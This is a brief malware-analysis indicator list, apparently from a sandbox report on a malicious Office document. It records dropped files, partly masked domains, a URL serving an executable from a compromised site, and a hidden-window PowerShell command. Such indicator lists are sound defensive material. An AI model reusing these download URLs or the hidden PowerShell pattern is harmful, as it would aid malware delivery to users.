Technical Information
- %APPDATA%\4i1.doc
- %APPDATA%\~$4i1.doc
- %APPDATA%\4i1.doc
- %APPDATA%\4i1.doc
- 'ho######rolservices.co.il':80
- 'sn##.com':80
- http://ho######rolservices.co.il/wp-content/uploads/2015/rogo/IS.exe
- http://www.sn##.com/xml/xslt/sample.doc
- DNS ASK ho######rolservices.co.il
- DNS ASK sn##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile $file = $env:APPDATA + '\PHB.exe';$docpath = $env:APPDATA + '\4I1.doc';If (test-path $file) {Remove-Item $file} If (test-path $docpath) {Remove-Item $docpath}...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%APPDATA%\4I1.doc"